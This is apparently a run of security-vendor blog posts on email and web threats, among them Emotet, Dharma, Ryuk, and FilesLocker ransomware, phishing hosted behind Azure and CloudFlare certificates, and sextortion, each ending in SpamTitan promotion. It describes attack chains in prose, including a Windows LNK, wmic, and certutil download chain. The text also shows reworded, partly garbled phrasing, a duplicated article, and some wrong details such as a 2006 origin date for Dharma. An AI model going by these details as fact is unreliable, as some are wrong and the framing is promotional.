The attack begins with malspam including a malicious link included in an email. Various themes could be used to encourage users into visiting the link, although one of the latest campaigns masquerades as emails from the national postal service in Brazil.

The emails claim the postal service tried to deliver a package, but the delivery failed as there was no one home. The tracking code for the package is listed in the email and the user is requested to click the link in the email to receive the tracking data.

In this instance, clicking the link will lead to a popup asking the user to confirm the installation of a zip file, which it is claimed includes the tracking information. If the zip file is downloaded, the user will be asked to click on a LNK file to receive the information. The LNK file runs cmd.exe, which executes a Windows Management Instrumentation (WMI) file: wmic.exe. This legitimate Windows file will be used to communicate with the attacker’s C2 server and will establish a copy of another Windows file – certutil.exe in the %temp% folder with the name certis.exe. A script then runs which tells the certis.exe file to connect to a different C2 server to install malicious files.

The focus of this attack is to use authentic Windows files to install the malicious payload: A banking Trojan. The use of legitimate Windows files for communication and installing files helps the attackers bypass security controls and download the malicious payload unnoticed.

These Windows files can install other files for legitimate purposes, so it is hard for security teams to identify malicious activity. This campaign focuses on users in Brazil, but this Office 365 threat should be a worry for all users as other threat actors have also adopted this tactic to download malware.

Due to the complexity in distinguishing between legitimate and malicious wmic.exe and certutil.exe activity, blocking an office 365 threat such as this is simplest at the initial point of attack: Stopping the malicious email from being sent to an inbox and providing security awareness training to workers to help them spot this Office 365 threat. The latter is vital for all companies. Employees can be turned into a strong last line of prevention using security awareness training. The former can be completed with a spam filtering solution like SpamTitan. SpamTitan will stop the last line of defense from being challenged.

Microsoft uses many different ways to spot malspam and prevent malicious messages from arriving in users’ inboxes; however, while efforts have been made to improve the effectiveness of the spam filtering controls of Office 365, many malicious messages are still reaching their destinations.

To enhance Office 365 security, a third-party spam filtering solution should be implemented. SpamTitan has been created to allow easy integration into Office 365 and provides superior security from a wide variety range of email threats.

SpamTitan uses a range of different methods to stop malspam from being sent to end users’ inboxes, including predictive techniques to discover threats that are misidentified by Office 365 security controls. These methods ensure industry-leading catch rates of over 99.9% and stop malicious emails from arriving in inboxes.

HookAds Malvertising Campaign Sending People to Trojans, Info Stealers and Ransomware Websites

One of the ways that threat actors download malware is using malvertising. Malvertising is the positioning of malicious adverts on legitimate websites that send visitors to websites where malware is installed. The HookAds malvertising campaign is one such example and those responsible for the campaign have been particularly active recently.

The HookAds malvertising campaign has one aim – to direct people to a website hosting the Fallout exploit kit. An exploit kit is malicious code that operates when a visitor arrives on a web page. The visitor’s computer is explored to determine whether there are any flaws – unpatched software – that can be exploited to silently download files.

In the case of the Fallout exploit kit, users’ devices are explored for several known Windows vulnerabilities. If one is discovered, it is exploited and a malicious payload is installed. Several malware variants are currently being shared via Fallout, including data stealers, banking Trojans, and ransomware.

According to threat analyst nao_sec, two different HookAds malvertising campaigns have been identified: One is being used to broadcast the DanaBot banking Trojan and the other is sending two malware payloads – The Nocturnal data stealer and GlobeImposter ransomware via the Fallout exploit kit.

Exploit kits can only be implemented to deliver malware to unpatched devices, so businesses will only be under threat from of this web-based attack vector if they are not 100% up to date with their patching. Sadly, many businesses are slow to run patches and exploits for new vulnerabilities are frequently uploaded to EKs such as Fallout. Due to this, a security solution is needed to obstruct this attack vector.

The threat actors responsible for the HookAds malvertising campaign are taking advantage of the low prices for advertising blocks on websites by low quality ad networks – those often utilized by owners of online gaming websites, adult sites, and other types of websites that should not be logged onto by employees. While the site owners themselves are not actively working with the threat actors behind the campaign, the malicious adverts are still displayed on their websites along with legitimate ads. The use of a web filter is advisable to mitigate this threat.

Emotet Malware Spread Using Thanksgiving Themed Spam Emails

There has been a rise in malspam campaigns spreading Emotet malware in recent time, with many new campaigns initiated that spoof financial institutions – the operating methods of the threat group responsible for the campaigns.

The Emotet malware campaigns use Word documents which have malicious macros. If macros are enabled, the Emotet malware payload is installed. The Word documents are either shared as email attachments or the spam emails include hyperlinks which bring users to a website where the Word document is installed.

Various social engineering tricks have been implemented in these campaigns. One new tactic that was spotted by Cofense is the wrapping of malicious hyperlinks in Proofpoint’s (PFPT) TAP URL Defense wrapping service to make the email seem benign.

According to Cofense, the campaign sends Emotet malware, although Emotet in turn installs a secondary payload. In previous campaigns, Emotet has been sent along with ransomware. First, Emotet steals details, then the ransomware is used to steal money from victims. In the most recent campaign, the secondary malware is the banking Trojan named IcedID.

Another campaign has been discovered that uses Thanksgiving themed spam emails. The messages seem to be Thanksgiving greetings for employees, and similarly include a malicious hyperlink or document. The messages say that the document is a Thanksgiving card or greeting. Many of the emails have been personalized to help with the deception and include the user’s name. In this campaign, while the document downloaded seems to be a Word file, it is actually an XML file.

Emotet malware has been refreshed recently. In addition to stealing details, a new module has been incorporated which harvests emails from an infected user. The past six months’ emails – which include subjects, senders, and message content – are stolen. This new module is thought to have been added to enhance the effectiveness of future phishing campaigns, for corporate espionage, and data theft.

The recent rise in Emotet malware campaigns, and the highly varied tactics implemented by the threat actors behind these campaigns, emphasise the importance of adopting a defense in depth strategy to block phishing emails. Groups should not rely on one cybersecurity solution to provide protection against hacking attacks.

Phishing campaigns aim for a weak link in security defenses: Staff members. It is therefore wise to ensure that all employees with corporate email accounts are trained how to recognize phishing threats. Training needs to be constant and should cover the latest tactics used by hackers to spread malware and steal details. Staff members are the last line of defense. Through security awareness training, the defensive line can be significantly enhanced.

As a frontline defense, all businesses and groups should use an advanced spam filtering solution. While Office 365 email includes a basic level of protection against phishing attacks, a powerful third-party anti-phishing and spam filtering solution is needed to provide security against more complex email attacks.

SpamTitan is an advanced email filtering software that uses predictive techniques to supply superior protection against phishing attacks, zero-day attacks, and new malware variants that bypass signature-based security.

Along with scanning message content, headers, attachments, and hyperlinks for spam and malware signatures, SpamTitan employs heuristics, machine learning, and Bayesian analysis to spot emerging threats. Greylisting is used to spot and obstruct large scale spam campaigns, such as those usually carried out by the threat actors spreading banking Trojans and Emotet malware.

Easy Way to Win Business and Boost Revenue for MSPs With Email Archiving

Email archiving is a great way for a company to win business and boost revenue. Although it is often an overlooked service, it can add value and improve profits for MSPs. Email archiving has a high margin, generates regular additional income, is easy to implement and manage and is an easy sell to clients.

Email Archiving in SMBs

Email archiving is now essential for organisations of all sizes, from SMBs to the largest enterprises. Large numbers of emails are sent and received on a daily basis by companies. Copies of those emails need to be stored, saved, and often retrieved. Storage of emails in mailboxes can often pose problems. Emails and attachments often need a considerable amount of storage, which means hardware must be purchased and maintained. Storing large volumes of emails in mailboxes is not a secure way of storing emails.

Although storing emails in backups is an option, it is far from ideal. Space is still needed and recovering emails when they are required is not a straightforward task as backup files are not indexed and searching for messages can take a considerable amount of time.

An email archive, in comparison, is indexed and searchable and therefore emails can be retrieved on demand quickly and with ease. If there is a legal dispute or when an organisation needs to demonstrate compliance (with GDPR or HIPAA for example) businesses need to be able to recover emails in an efficient manner. Additionally, an email archive also provides a clear chain of custody, which is also required to comply with a lot of regulations.

Cloud-based archives offer secure storage for emails and have no restrictions on storage space. The cloud storage offered is also highly scalable and emails can be easily retrieved, regardless of the location.

In summary, email archiving can enhance security, lower costs, improve efficiency and is an invaluable compliance tool.

Email Archiving in MSPs

Due to the benefits of email archiving it should be an easy sell for MSPs, either as Office 365 archiving-as-a-service as an add-on or incorporated into existing email packages. This is in order to offer greater value and make your packages unique compared to those of your competitors.

Office 365 archiving-as-a-service will generate regular income for very little effort as an add-on service. It will also improve the meagre returns from simply offering Office 365 to your clients. Overall, it can help you to attract more business when put as part as a package.

Email Archiving Made Simple Made Simple for MSPs by ArcTitan

TitanHQ is a leading provider of cloud-based security solutions for MSPs. TitanHQ products such as SpamTitan, WebTitan and ArcTitan SaaS email archiving have all been developed from the group up to specifically meet the various needs of MSPs.

ArcTitan has been developed by TitanHQ to be easy to implement and manage. It seamlessly integrates into MSPs service stacks, allowing them to provide greater value to clients and make email services a much more lucrative offering. As a result of this, TitanHQ is able to offer generous margins on ArcTitan for MSPs.

Benefits of ArcTitan for MSPs

  • Easy implementation
  • Software downloads not necessary
  • No hardware requirements
  • Secure, cloud-based storage
  • Easy to operate centralised management system
  • Increases profitability of Office 365
  • Highly scalable email archiving
  • Easy set up for MSPs
  • Usage easy for clients
  • Improved margins for MSPs
  • Full suite of APIs supplied for simpler integration
  • Multiple hosting options: TitanHQ Cloud, dedicated private cloud, or host the solution in your own data centre
  • Fully rebrandable (ArcTitan can be supplied in white-label form ready for your own branding)
  • Usage-based pricing and monthly billing available
  • World class customer service and support

If you are yet to start offering email archiving to your clients or if you are unhappy with your current provider, contact the TitanHQ MSP team today for full ArcTitan product information, pricing details and further information on our MSP Program.

Office 365 Phishing Attacks Are Abusing Cloud Service Providers’ SSL Certificates

Office 365 phishing attacks take place very often, are highly realistic and Office 365 spam filtering controls are easily being got around by hackers to ensure messages reach inboxes. Additionally, phishing forms are being hosted on web pages that are secured with valid Microsoft SLL certificates to fool users into thinking that the websites are authentic.

Office 365 Phishing Attacks Can Be Difficult to Spot

Should a phishing email making it past perimeter defenses and land in an inbox, there are several tell-tale signs that the email is not authentic.

There are often spelling errors, incorrect grammar, and the messages are sent from questionable senders or domains. To enhance the response rate, hackers are now spending much more time carefully crafting their phishing emails and they are often practically indistinguishable from authentic communications from the brand they are spoofing. As regards formatting, they are carbon copies of genuine emails complete with the branding, contact data, sender details, and logos of the company being spoofed. The subject is perfectly realistic and the content well composed. The actions the user is requested to take are perfectly believeable.

Hyperlinks are included in emails that direct users to a website where they are required to enter their login details. At this point of the phishing attack there are usually further signs that all is not as it seems. A warning may appear that the website may not be authentic, the website may start with HTTP rather than the safe HTTPS, or the SSL certificate may not be owned by the company that the website is spoofing.

Even these indications are not always present, as has been shown is many recent Office 365 phishing attacks, which have the phishing forms hosted on web pages that have valid Microsoft SSL certificates or SSL certificates that have been awarded to other cloud service providers such as CloudFlare, DocuSign, or Google.

Microsoft Azure Blog Storage Phishing Campaign

One recent phishing scam uses Azure blob storage to receive a current SSL certificate for the phishing form. Blob storage can be used for storing a variety of unstructured information. While it is possible to use HTTP and HTTPS, the phishing campaign uses the latter, which will show a completed SSL certificate from Microsoft.

In this campaign, end users are shared an email with a button that must be clicked to view the content of a cloud-hosted file. In this case, the document seems to be from a Denver law firm. Clicking the button sends the user to an HTML page hosted on Azure blog storage that requires Office 365 credentials to be handed over to view the document. Since the document is hosted on Azure blob storage, a Microsoft service, it has a valid SSL certificate that was issued to Microsoft adding legitimacy to the hacking attempt.

Entering login credentials into the form will send them to the attackers. The user will then be directed to another webpage, most likely unaware that they have been phished.

CloudFlare IPFS Gateway Targeted

A similar campaign has been discovered that abuses the CloudFlare IPFS gateway. Users can access content on the IPFS shared file system through a web browser. When linking to this gateway through a web browser, the HTML page will be secured with a CloudFlare SSL certificate. In this instance, the login requires data to be entered including username, password, and recovery email address and phone number – which will be forwarded to the hacker, while the user will be directed to a PDF file unaware that their details have been stolen.

Office 365 Phishing Protections are Not Enough

Office 365 users are being targeted by hackers as they know Office 365 phishing controls can be easily got around. Even with Microsoft’s Advanced Threat Protection for Office 365, phishing emails are still shared. A 2017 study by SE Labs showed even with this additional anti-phishing control, Office 365 anti-phishing measures were only rated in the low-middle of the market for security. With only the basic Exchange Online Protection, the protection was worse again.

Whether you run an SMB or a large enterprise, you are likely to receive high amounts of spam and phishing emails and many messages will be sent to end users’ inboxes. Since the emails can be virtually impossible for end users to identify as malicious, it is probable that all but the most experienced, well trained, security conscious workers will be tricked. What is therefore needed is an advanced third-party spam filtering solution that will work alongside Office 365 spam filtering controls to provide far greater security.

How to Make Office 365 Safer

While Office 365 will prevent spam emails and phishing emails (Osterman Research showed it prevents 100% of known malware), it has been shown to lack performance against advanced phishing threats including spear phishing.

Office 365 does not have the same level of predictive technology as specialized on-premises and cloud-based email security gateways which are much better at detecting zero-day attacks, new malware, and advanced spear phishing campaigns.

To greatly enhance protection what is needed is a dedicated third-party spam filtering solution for Office 365 such as SpamTitan. SpamTitan focuses on defense in depth, and supplies superior protection against advanced phishing attacks, new malware, and sophisticated email attacks to make sure malicious messages are blocked or quarantined rather than being sent to end users’ inboxes. Some of the extra protections provided by SpamTitan against Office 365 phishing attacks are detailed in the image here:

” alt=”” aria-hidden=”true” />

To discover more about making Office 365 safer and how SpamTitan can benefit your company, get in touch TitanHQ. Our highly experienced sales consultants will be able to inform you on the full range of benefits of SpamTitan, the best deployment option, and can offer you a free trial to allow you to personally evaluate the solution.

New Variant of Dharma Ransomware Discovered

A new Dharma ransomware variant has been created that is evading detection by most antivirus engines. Heimdal Security has said that his most recent Dharma ransomware variant captured by its researchers was only discovered to b malware by one of the 53 AV engines on VirusTotal.

Dharma ransomware (also referred to as CrySiS) was first spotted in 2006 and is still being developed. 2018 several new Dharma ransomware variants have been made public, each using new file extensions for encrypted files (.bip, .xxxxx, .like, java, .arrow, .gamma, .arena, .betta, and .tron to name but a few). In just the past two months four new Dharma ransomware variants have been discovered.

Those to blame for Dharma ransomware have claimed many victims in recent months. Successful attacks have been made public recently by Altus Baytown Hospital in Texas, the Arran brewery in Scotland, and the port of San Diego.

While free decryptors for Dharma ransomware have been created, the constant evolution of this ransomware threat rapidly makes these decryptors obsolete.  Infection with the latest variants of the ransomware threat only allows victims three options: pay a sizeable ransom to recover files, restore files from backups, or face permanent file deletion.

The latter is not viable given the extent of files that are encrypted. Rescuing files from backups is not always possible as Dharma ransomware can also encrypt backup files and can erase shadow copies. Payment of a ransom should not be completed as there is no guarantee that files can or will be decrypted.

Safeguarding against ransomware attacks requires a combination of policies, procedures, and cybersecurity solutions. Dharma ransomware attacks are mostly carried out via two attack vectors: The exploitation of Remote Desktop protocol (RDP) and through email malspam campaigns.

The most recent Dharma ransomware variant attacks involve an executable file being dropped by a .NET file and HTA file. Infections take place via RDP-enabled endpoints using brute force attempts to guess passwords. Once the password is stolen, the malicious payload is deployed.

While it is not yet known how the Arran brewery attack occurred, a phishing attack is suspected. Phishing emails had been received just prior to file encryption. “We cannot be 100 percent sure that this was the vector that infection occurred via, but the timing seems to be more than coincidental,” said Arran Brewery’s managing director Gerald Michaluk.

To safeguard against RDP attacks, RDP should be turned off unless it is absolutely necessary. If RDP is required, access should only be possible through a VPN and strong passwords should be put in place. Rate limiting on login attempts should be set up to block login attempts after a set number of failures.

Due to this, good backup policies are essential. They will mean that file recovery is possible without payment of a ransom. Multiple copies of backups should be made with one copy held securely off site.

To safeguard against email-based attacks, an advanced spam filter is necessary. Spam filters that rely on AV engines may not spot the latest ransomware variants. Advanced reviews of incoming messages are vital.

SpamTitan can enhance protection for companies through combination of two AV engines and predictive techniques to block new types of malware whose signatures have not yet been installed on AV engines.

For additional information on SpamTitan and safeguarding your email gateway from ransomware attacks and other threats, contact TitanHQ’s security experts today.

New WebTitan and ArcTitan Integrations as Z Services Expands Partnership with Titan HQ

TitanHQ has recently expanded its partnership with Z Services, the leading SaaS provider of cloud-based cybersecurity solutions in the MENA region, which will result in new WebTitan and ArcTitan integrations.

Z Services operates 17 secure data centers in the UAE (base location), Qatar, Egypt, Saudi Arabia, Morocco, Jordan, Kuwait, Oman, Bahrain, and Kuwait. It is the only company in the Middle East and North Africa to offer a multi-tenant, cloud-based, in-country, cybersecurity architecture.

Z Services partnered with TitanHQ in February of 2017 and integrated TitanHQ’s award-winning email filtering technology into its service stack. Through doing this, it enabled Z Services to start offering SpamTitan-powered Z Services Anti-Spam SaaS to its clients. TitanHQ’s email filtering technology now also enables Z Services’ clients to filter out spam email and protect against sophisticated email-based threats such as malware, viruses, ransomware, botnets, phishing and spear phishing.

Due to the integration proving to be such a great success for Z Services, the firm has now decided to take its partnership with Titan HQ to the next level by integrating two new TitanHQ-powered SaaS solutions into its service stack. WebTitan – TitanHQ’s award-winning web filtering technology and ArcTitan – its innovative email archiving solution, have now both been incorporated Z Services’ MERALE SaaS offering. MERALE has been specifically developed to meet the needs of small to medium sized enterprises, such as cybersecurity, threat protection, and compliance solutions.

“With cybersecurity growing as a critical business concern across the region, there is a clear need to make security an operational rather than a capital expense. Hence the paradigm shift in the delivery of effective security solutions from the traditional investment and delivery model to an agile SaaS model through the primary connectivity provider of SMEs – the ISPs,” explained Z Services’ President for the Middle East and North Africa, Nidal Taha. “MERALE will be a game-changer in how small and medium businesses in the region ensure their protection, and as a subscription-based service, it removes the need for heavy investments and long-term commitments.”

Speaking from Titan HQ’s point of view, CEO Ronan Kavanagh said “We are delighted to continue our successful partnership with Z Services and share their vision for serving the SME segment with leading edge SaaS based security solutions. With this development Z Services is strengthening its leadership position as an innovative cloud-based cybersecurity solutions provider in the Middle East and North Africa.”

TitanHQ’s cloud-based cybersecurity solutions have been developed specifically to meet the needs of Managed Service Providers. More than 7,500 businesses worldwide are currently using the email filtering, web filtering, and email archiving solutions supplied by TitanHQ and more than 1,500 MSPs are now offering TitanHQ solutions to their clients.

When compared to many other cybersecurity solution providers, TitanHQ offers its products with a range of hosting options (including within an MSP’s own infrastructure), as full white label solutions ready for MSPs to apply their own branding. Through offering their clients TitanHQ solutions MSPs are able to significantly reduce costs related to support and engineering. They achieve this by blocking a wide range of cyber threats at source. MSPs also benefit from generous margins and world class customer service and support.

If you are an MSP and have not yet incorporated email filtering, web filtering, and email archiving solutions into your service stack, if you are unhappy with your current providers, or are looking to increase profits significantly while also ensuring your clients have the best protection against email and web-based threats, contact TitanHQ today for further information.

Users with Valid SSL Certificates Being Tricked by CloudFlare IPFS Gateway Phishing Forms

The CloudFlare IPFS gateway has only recently been made publically available, but it is already being used by phishers to serve malicious content.Cloudflare IPFS gateway phishing attacks are likely to have a good success rate, as some of the checks carried out  by end users to confirm the legitimacy of domains will not produce red flags.

The IPFS gateway is a P2P system that permits files to be shared easily throughout a group and accessed through a web browser. Content is sent to different nodes throughout the networked systems. The system can be used for creating sharing websites, and CloudFlare has made this process simpler by offering free SSL certificates and allowing domains to be easily linked to IPFS.

If phishers host their phishing forms on CloudFlare IPFS, they can use CloudFlare’s SSL certificate. Since the phishing page will begin with cloudflare-ipfs.com, this adds legitimacy. The CloudFlare-owned domain is more likely to be trusted than other phishing domains.

When CloudFlare IPFS Gateway phishing forms are detected, visitors will be advised that the webpage is secure, the site starts with HTTPS, and a green padlock will be displayed. If the visitor takes the time to check certificate information of the web page, they will find it has been issued to CloudFlare-IPFS.com by CloudFlare Inc., and the certificate is authentic. The browser will not serve any warning and CloudFlare IPFS Gateway phishing content will therefore seem genuine.

At least one threat actor is using the CloudFlare IPFS Gateway for phishing and is hosting forms that state they are standard login pages for Office 365, DocuSign, Azure AD, and other cloud-based services, complete with proper logos.

If a visitor fills out the form information, their credentials will be forwarded to the operator of a known phishing domain – searchurl.bid – and the user will be shown a document about business models, strategy and innovation. This may also not lead to a red flag.

The CloudFlare IPFS Gateway phishing strategy is like that used on Azure Blob storage, which also take advantage of legitimate SSL certificates. In that case the certificate is produced by Microsoft.

It is becoming more and more important for phishers to use HTTPS for hosting phishing content. As more businesses change from HTTP to HTTPS, and browsers such as Chrome now display warnings to users about insecure sites, phishers have similarly had to move to HTTPS. Both CloudFlare IPFS Gateway and Azure Blog storage offer a simple way to do this.

In both instances, links to the malicious forms are shared through spam email. One of the most typical ways to do this is to include an email attachment that contains a button which must be clicked in order to install content. The user is warned that the content of the file is secured, and that professional email login credentials must be entered in order to see the content. The document may be an invoice, purchase order, or a scanned document that needs to be looked over.

The rise in use of cloud platforms to host phishing content makes it more important than ever for groups to set up advanced phishing defenses. A strong spam filter such as SpamTitan should be used to block the initial emails and prevent them from being sent to end users’ inboxes. These phishing tactics should also be included in security awareness training to raise awareness of the threat and to warn users that SSL certificates do not necessarily mean the content of a web page is authentic. Web filtering solutions are also vital for restricting access to known malicious web pages, should a user click on a malicious link.

Universities Targeted as Hackers Search for Valuable Research Data

Hackers have been targeted universities extensively in the last year according to figures recently released by Kaspersky Lab.

Universities store very valuable information. As research group collate valuable proprietary data. The results of research studies are particularly valuable. It may not be possible to sell data as easily as credit cards and Social Security numbers, but there are certainly buyers will pay top dollar for valuable research. Nation state sponsored hacking groups are focusing on universities and independent hacking groups are getting in on the act and carrying out cyberattacks on universities.

There are many possible attack vectors that can be used to obtain access to university systems. Software flaws that have yet to be patched can be targeted, misconfigured cloud services such as unsecured S3 buckets can be logged onto, and brute force attempts can be used to estimate guess passwords. However, phishing attacks on universities are often witnessed.

Phishing is often linked with scams to obtain credit card information or login details to Office 365 accounts, with companies and healthcare groups often targeted. Universities are also in the firing line and are being attacked.

The reason phishing is so common is because it is often the most simple way to access targeted networks, or at least gain a foothold for additional attacks. Universities are naturally careful about protecting their research and security controls are usually used accordingly. Phishing permits those controls to be got around relatively easily.

A successful phishing attack on a student may not result in much damage, at least initially. However, once access to their email account is obtained, it can be used for additional phishing attacks on lecturers for example.

Spear phishing attacks on lecturers and research associates offer a more standard route. They are likely to have higher privileges and access to sought after research data. Their accounts are also likely to include other interesting and useful information that can be used in a wide variety of secondary attacks.

Email-based attacks can include malicious attachments that send information stealing malware such as keyloggers, although many of the the latest attacks have used links to fake university login web pages. The login pages are identical copies of the genuine login pages used by universities, the only difference being the URL on which the page is hosted.

Kaspersky Lab has revealed that over 1,000 phishing attacks on universities have been detected in the past 12 months and 131 universities have been focused on. Those universities are spread across 16 different countries, although 83/131 universities were in the United States.

Stopping phishing attacks on universities, staff, and students requires a multi layered approach. Technical security measures must be implemented to cut risk, such as an advanced spam filter to block most of phishing emails and stop them being sent to end users. A web filtering solution is vital for restricting access to phishing websites and web pages hosting malware. Multi-factor authentication is also vital to ensure that if account information is infiltrated or passwords are guessed, an extra form of authentication is required to gain access to accounts.

As a last line of security, staff and students should trained so they are conscious of the risk from phishing.

Office 365 Phishing Attacks Using Cloud Service Providers’ SSL Certificates

Office 365 phishing attacks are widely witnessed, very realistic, and Office 365 spam filtering controls are easily being got around by cybercriminals to ensure messages land in inboxes. Further, phishing forms are being hosted on webpages that are secured with valid Microsoft SLL certificates to trick users into believing that the websites are real.

Should a phishing email get past perimeter defenses and arriving in an inbox, there are many giveaway signs that the email is not genuine.

There are often spelling errors, bad grammar, and the messages are sent from suspicious senders or domains. To improve the response rate, cybercriminals are now spending much more time carefully creating their phishing emails and they are often virtually indistinguishable from real communications from the brand they are spoofing. Formatting wish, they are carbon copies of real emails complete with the branding, contact information, sender details, and logos of the business being spoofed. The subject is perfectly realistic and the content well composed. The actions the user is asked to take are perfectly plausible.

Hyperlinks are included in emails that direct users to a website where they are asked to enter their login credentials. At this stage of the phishing attack there are usually more indications that all is not as it seems. A warning may flash up that the website may not be authentic, the website may begin with HTTP rather than the secure HTTPS, or the SSL certificate may not be owned by the company that the website is spoofing.

Even these tell-tale signs are not always on display, as has been shown is many recent Office 365 phishing attacks, which have the phishing forms hosted on webpages that have current Microsoft SSL certificates or SSL certificates that have been issued to other cloud service providers such as CloudFlare, DocuSign, or Google.

To greatly enhance your security measures you will require a dedicated third-party spam filtering solution for Office 365 such as SpamTitan. SpamTitan focuses on defense in depth, and supplies superior protection against advanced phishing attacks, new malware, and complex email attacks to ensure malicious messages are restricted or quarantined rather than being sent to end users’ inboxes. Some of the additional security measures supplied by SpamTitan against Office 365 phishing attacks are detailed in the image here:

To find out more about making Office 365 more secure and how SpamTitan can benefit your company, contact TitanHQ. Our highly experienced sales consultants will be able to advise you on the full range of benefits of SpamTitan, the best deployment option, and can offer you a free trial to allow you to personally evaluate the solution before committing to a purchase.

 

Chinese and English Speakers Targeted New RaaS Variant of FilesLocker Ransomware

FilesLocker, a new ransomware threat has been discovered is currently being offered as ransomware-as-a-service (RaaS) via a TOR malware forum. FilesLocker ransomware is not a extremely sophisticated ransomware variant, but it still poses a major threat.

FilesLocker ransomware is a dual language ransomware variant that shows ransom notes in both Chinese and English. MalwareHunterTeam has found a Chinese forum on TOR where it is being offered to affiliates to distribute for a percentage of the ransom payments.

Unless advertised more widely, the number of affiliates that sign up may be restricted, although it may prove popular. There are a number of features which could see the ransomware variant favored over other RaaS offerings, notably a sliding scale on commissions. The developers are offering a 60% cut of ransoms, which will go up by 75% if sufficiently high numbers of infections can be generated.

While relatively straightforward, FilesLocker ransomware still uses an RSA 2048+AES algorithm to lock files and it erases Windows shadow copies to hamper efforts to recover files without paying the ransom. FilesLocker is also capable of file encryption in a broken network environment.

No server is needed and the ransomware is working on all Windows versions later than XP plus 32-bit and 64-bit Windows Server. Users are also able to easily keep an eye for infections through a tracking feature which displays infections by country.

There is no free decryptor for FilesLocker ransomware in existence. Recovery can only be completed by restoring files from backups.

While news of a new RaaS offering is never welcome, there has at least been some good news on the ransomware front this recently at least for some victims.

GandCrab ransomware is another RaaS offering that has been for sale since January 2018. It has been widely adopted, with many affiliates using it to distribute the ransomware over the past 10 months.

A GandCrab ransomware decryptor was designed by Bitdefender in February that was able to unlock files encrypted by version 1.0 and v1.1 of GandCrab ransomware. The decryptor was developed after private keys were released online. However, it didn’t take long for v2.0 to be released, for which no free decryptor is available. There have been a number of further updates to GandCrab ransomware over the past few months, with v5.0 of the ransomware variant released in late September.

This week, Bitdefender has revealed that after collaboration with the Romanian Police, Europol and other law enforcement bodies, a new decryption tool has been developed that permits GandCrab ransomware victims to decrypt files for free, provided they have been hacked with version 1, 4, or 5 of the ransomware.

The version can be deduced by the extension used on encrypted files. V1=GDCB; v2/3=CRAB; v4=KRAB; and v5 uses a completely random 10-character extension.

The free GandCrab ransomware decryptor has been placed to the NoMoreRansom Project website. Bitdefender is currently attempting to put in plsvr on a free decryptor for v2 and v3 of GandCrab ransomware.

Recipe Unlimited Ryuk Ransomware Attack Leads to Restaurant Closures

What is thought to have been a Ryuk ransomware attack on Recipe Unlimited, a group of some 1,400 restaurants in Canada and North America, has forced the chain to shutdown computers and temporarily close the doors of some of its restaurants while IT teams try to address the attack.

Recipe Unlimited, previously known as Cara Operations, operates pubs and restaurants under many different titles, including Harvey’s, Swiss Chalet, Kelseys, Milestones, Montana’s, East Side Mario’s, Bier Markt, Prime Pubs, and the Landing Group of Restaurants. All of these  pub and restaurant brands have been impacted by the Recipe Unlimited ransomware attack.

While only a relatively small number of restaurants were forced to close, the IT outage caused widespread issues, stopping the restaurants that remained open from taking card payments from customers and using register systems to complete orders.

While it was at first unclear what caused the outage, a ransomware attack on Recipe Unlimited was later confirmed. A staff member at one of the impacted restaurants provided CBC News with a copy of the ransom note that had appeared on the desktop of one of the infected computers.

The ransom note is the same sent by the threat actors behind Ryuk ransomware. They say that files were encrypted with “military algorithms” which cannot be decrypted without a key that is only available from them. While it is unclear exactly how much the hackers asked for payment to decrypt files, they did threaten to increase the cost by 0.5 BTC (Approx. $4,000 CAD) per day until contact was made. The Recipe Unlimited ransomware attack is thought to have taken place on September 28. Some restaurants remained closed on October 1.

The ransomware attack on Recipe Unlimited is just one of the recently witnessed attacks involving Ryuk ransomware. The hackers are understood to have gathered more than $640,000 in ransom payments from companies who have had no other option other than to pay for the keys to unlock their files. The ransomware attack on Recipe Unlimited did not push up that total, as Recipe Unlimited conducted regular backups and expects to be able to restore all systems and data, although naturally that will take some time.

Ransomware attacks on restaurants, businesses, healthcare suppliers, and cities are extremely common and can be incredibly costly to address. The recent City of Atlanta ransomware attack caused widespread disruption due to the massive scale of the attack, involving thousands of computers.

The cost of addressing the attack, including making upgrades to its systems, is likely to cost around $17 million, according to estimates from city officials. The Ransomware attack on the Colorado Department of Transportation is estimated to cost $1.5 million to resolve.

There is no straightforward solution that will block ransomware attacks, as many different vectors are used to download the malicious file-encrypting software. Preventing ransomware attacks requires defense in depth and multiple software solutions.

Spam filtering solutions should be used to stop email delivery of ransomware, web filters can be set up to prevent access to malicious websites where ransomware is downloaded, antivirus solutions may detect infections in time to block attacks, and intrusion detection systems and behavioral analytics solutions are useful to quickly identify an attack in progress and limit the harm inflicted.

All operating devices and software must be kept fully up to date, strong passwords should be implemented, and end user must receive training to make them aware of the danger posed by ransomware. They should be trained in security best practices and trained how to identify threats. Naturally, robust backup policies are necessary to ensure that in the event of disaster, files can be rescued without having to meet the ransom demand.

New Sextortion Scam: Emails Appear to Have Been Sent from User’s Email Account

A new sextortion scam has been discovered that tries to fool the recipient of the message into believing their email account has been compromised and that their computer is under full control of the hacker.

The hackers trick he user’s email address so that it appears that the message has been issued from the user’s email account – The sender and the recipient names are the exact same.

A quick and simple check that can be performed to deduce whether the sender name shown is the actual account that has been used to send the email is to click forward. When this is completed, the display name is shown, but so too is the actual email address that the message has been broadcast from. In this instance, that check does not work making it seem that the user’s email account has actually been compromised.

The messages used in this campaign try to extort money by suggesting the hacker has obtained access to the user’s computer by means of a computer virus. It is alleged that the virus gives the attacker the ability to review the user’s internet activities in real time and use the computer’s webcam to record the user.

The hacker claims that the virus was placed to the computer due to the user viewing an adult website and that while viewing internet pornography the webcam was active and recording. “Your tastes are so weird,” states the hacker in the email.

The hacker claims that they will synch the webcam footage with the content that the user was looking at and send a copy of the video to all the user’s partner, friends, and relatives. It is said that all the user’s accounts have been compromised. The message also has an example of one of the user’s passwords.

While it is very unlikely that the password given in the email is valid for any of the user’s account, the message itself will still be worrying for some individuals and will be enough to get them to make the requested payment of $800 to have the footage erased.

However, this is a sextortion scam where the hackers have no leverage as there is no virus and no webcam footage. However, it is clear that at least some recipients were not willing to take a risk.

According to security experts SecGuru, who received a version of the email in Dutch and found a similar English language version, the Bitcoin account used by the hacker had received payments of 0.37997578 Bitcoin – $3,500 – in the first two days of the attack.  Now 7 days after the first payment was completed, the earnings have grown to 1.1203 Bitcoin – $6,418 – with 15 people having paid.

A similar sextortion scam was carried out in the summer which also had an interesting twist. It implemented an old password for the account that had been downloaded from a data dump. In that instance, the password was real, at least at some point in the past, which made the scam seem authentic.

 

Increase in Phishing Attacks on Publishers and Literary Scouting Agencies Leads to Warning

Financial entities, healthcare groups and universities have seen a growth in cyberattacks in recent times, but there has also been a rise in phishing attacks on publishers and literary scouting agencies.

